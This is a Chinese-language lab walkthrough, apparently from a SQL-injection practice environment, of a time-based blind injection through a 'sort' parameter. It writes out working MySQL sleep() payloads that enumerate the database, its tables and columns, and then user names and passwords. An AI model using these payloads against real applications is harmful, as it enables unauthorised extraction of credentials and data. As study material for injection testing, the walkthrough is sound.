欢迎界面还是以sort作为注入点
首先判断属于数字型还是字符型 输入如下
sort=rand()
页面从没有变化 说明属于字符型
然后输入1'
发现没有报错信息 不能使用报错注入 只能通过结果去反映处你的注入是对是错
首先输入1'--+ 成功回显 说明注入类型就是属于单引号字符型
然后接着我们选择使用条件盲注
首先获取一下数据库的长度 输入如下
sort=1' and if(length(database())=8,sleep(10),1)--+
能够清楚再任务栏处发现正在响应的图标
接着进行获取数据库名称的首字母 输入如下
sort=1' and if(ascii(substr((database()),1,1))=115,sleep(10),1)--+
正在响应 说明数据库的首字母就是s
接着进行获取表格个数的操作 输入如下
sort=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=4,sleep(10),1)--+
正在响应 表格个数为4个
然后获取一下第一个表格的名称的首字母 输入如下
sort=1' and if((select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=6,sleep(10),1)--+
还在响应 说明第一个表格的名称个数为6个
接着获取一下第一个表格的名称的首字母 输入如下
sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(10),1)--+
还在响应 第一个表格的名称的首字母为e
接着获取一下字段的个数 输入如下
sort=1' and if((select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=3,sleep(10),1)--+
还在响应 字段数量为3个
接着获取一下第一个字段的的名称个数 输入如下
sort=1' and if((select length(column_name) from information_schema.columns where table_name='users' and table_schema=database() limit 0,1)=2,sleep(10),1)--+
还在响应 第一个字段的长度为2
接着获取一下第一个字段的首字母 输入如下
sort=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),1,1))=105,sleep(10),1)--+
仍然再响应 第一个字段的首字母为i
最后进行获取第一个用户名的首字母操作 输入如下
sort=1' and if(ascii(substr((select group_concat(username,password) from users),1,1))=68,sleep(10),1)--+
还在回显 说明第一个用户名的首字母为D
嘿嘿大功告成!!